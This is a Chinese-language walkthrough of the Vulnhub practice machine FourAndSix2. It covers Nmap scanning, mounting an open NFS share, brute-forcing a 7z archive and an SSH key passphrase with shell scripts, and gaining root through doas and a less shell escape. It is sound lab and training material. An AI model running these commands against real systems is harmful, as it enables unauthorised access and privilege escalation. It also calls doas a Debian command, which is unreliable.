靶机【Vulnhub】FourAndSix2

FourAndSix2

1.主机发现

靶机给出了网卡ip和网关

还是Nmap ping扫一下

C:\Users\ASUS>Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-19 10:48 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.43.1
Host is up (0.0070s latency).
MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communications)
Nmap scan report for fourandsix2 (192.168.43.55)
Host is up (0.00s latency).
MAC Address: 00:0C:29:F4:30:CC (VMware)
Nmap scan report for ToolsScannerKali20201 (192.168.43.193)
Host is up (0.0010s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for LAPTOP-Q7VIH3TM (192.168.43.2)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.92 seconds

2.信息收集

端口扫描

C:\Users\ASUS>Nmap 192.168.43.55 -A -p-
Nmap scan report for fourandsix2 (192.168.43.55)
Host is up (0.000094s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 ef:3b:2e:cf:40:19:9e:bb:23:1e:aa:24:a1:09:4e:d1 (RSA)
|   256 c8:5c:8b:0b:e1:64:0c:75:c3:63:d7:b3:80:c9:2f:d2 (ECDSA)
|_  256 61:bc:45:9a:ba:a5:47:20:60:13:25:19:b0:47:cb:ad (ED25519)
111/tcp  open  rpcbind 2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100005  1,3          648/tcp  mountd
|_  100005  1,3          946/udp  mountd
648/tcp  open  mountd  1-3 (RPC #100005)
2049/tcp open  nfs     2-3 (RPC #100003)
MAC Address: 00:0C:29:F4:30:CC (VMware)
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.1
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms fourandsix2 (192.168.43.55)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1141.72 seconds

靶机使用NFS协议共享文件。

开放有2049端口

111端口为2049端口的RCP协议，也就是111端口调用2049端口。

3.漏洞利用

MFS扫描nfs开放可挂载目录

kali@ToolsScannerKali20201:~$ msfconsole 
[!] The following modules could not be loaded!..\
[!]     /usr/share/metasploit-framework/modules/exploits/windows/iis/cve-2017-7269.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __                                             
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                                            
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                                           
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                                           
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\                                          
                                                                                                        

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search

msf5 > use auxiliary/scanner/nfs/nfsmount 
msf5 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 192.168.43.55
RHOSTS => 192.168.43.55
msf5 auxiliary(scanner/nfs/nfsmount) > run

[+] 192.168.43.55:111     - 192.168.43.55 NFS Export: /home/user/storage []
[*] 192.168.43.55:111     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

/home/user/storage

showmount命令查看

root@ToolsScannerKali20201:/home/kali# showmount -e 192.168.43.55
Export list for 192.168.43.55:
/home/user/storage (everyone)

挂载共享文件目录

root@ToolsScannerKali20201:/home/kali# mount -t nfs 192.168.43.55:/home/user/storage /mnt/
root@ToolsScannerKali20201:/home/kali# cd /mnt/
root@ToolsScannerKali20201:/mnt# ls
backup.7z
root@ToolsScannerKali20201:/mnt# 

发现了一个需要输入解压密码的压缩包

爆破压缩文件

使用GitHub上下载下来的脚本进行爆破

下载链接：https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/7z-crack.sh

cat $2 | while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done

密码为 chocalate

拷贝私钥登录

发现需要私钥短语

cp id_rsa ~/.ssh
ssh user@192.168.43.55
yes

爆破私钥短语

GitHub上下载脚本爆破私钥短语

脚本链接：https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/id_rsa-crack.sh

私钥短语：12345678

4.提权

ssh登录

root@ToolsScannerKali20201:/mnt# ssh user@192.168.43.55
Enter passphrase for key '/root/.ssh/id_rsa': 
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

fourandsix2$ whoami
user

find查询suid权限命令

fourandsix2$ find / -perm -4000 2>/dev/null  
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown

发现敏感命令 doas为debian下的sudo命令

doas提权

查看命令使用方法

doas /usr/bin/less /var/log/authlog

按v  进入编辑模式

:/bin/sh   因为这个命令拥有root权限，所以这里调用root用户的/bin/sh

提权成功

5.查看flag

find / -name *flag*
cat /root/flag.txt